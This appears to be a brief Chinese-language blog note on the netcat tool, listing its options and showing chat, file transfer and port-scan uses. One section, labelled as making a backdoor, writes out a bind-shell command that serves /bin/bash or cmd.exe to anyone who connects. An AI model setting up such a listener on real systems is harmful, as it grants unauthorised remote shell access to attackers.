netcat又稱nc工具，其最主要的作用就是建立連接並返回兩個數據流，剩下的就看各位的想象力了，想象力是很重要的，這也是這個工具的強大之處的所在，所以重要的東西才要說三遍，想象力！

具體參數如下：

-d 無命令行界面，使用後臺模式 -e prog 程序重定向，一旦連接，就執行 [危險！！],（可以理解為向外發送一個東西，對方連上自動執行） -g gateway 源路由跳躍點，不超過8 -G num 源路由指示器：4,8,12.。。。。。 -h 獲取幫助信息 -i<延遲秒數> 延時設置，端口掃描時使用 -l 監聽入站信息 -L 監聽知道NetCat被結束（可斷開重連） - n 以數字形式表示的IP地址，不要使用DNS反向查詢IP地址的域名 - o<輸出文件> 可以將連接上往來傳輸的數據以16進制的形式記錄到logfile中（每行的左半部分是16進制顯示，右半部分為ascii顯示）。其中，

每行的第一個字符為”<”或”>”，分別表示接收的數據或發送的數據。

- p post 打開本地端口 - r 隨機本地和遠程的端口 - s addr 本地源地址 - t 以TELNET的形式應答入站請求 - u 用UDP建立連接 - v 顯示詳細信息[使用-vv獲取更信息的信息] - w<超時秒數> 連接超時設置 - z I/O模式[掃描時使用]，連接成功後立即關閉連接， 不進行數據交換

功能：

1.可以用來聊天。

nc -l -p 6666 監聽6666端口，並顯示詳細信息(-l:監聽入站信息)

nc 172.16.150.152 6666 連接172.16.1.150.152的6666端口

2.做後門

nc 的-e參數程序重定向，一 旦連接，就執行 [危險！！],（可以理解為向外發送一個東西，對方連上自動執行）

nc -vlp 6666 -e /bin/bash #監聽6666端口，然後把/bin/bash文件發送出去，只要有人連接此端口，對方就執行/bin/bash文件，此文件為linux的shell,windows對應的是nc -e C:\Windows\System32\cmd.exe

直接監聽ip 端口就可以反彈得到一個shell

關於nc的一些理解：

當然還可以拿來傳輸文件、掃描端口nc如果連不上那麽就是沒有開，反之開放。

netcat、nc工具隨記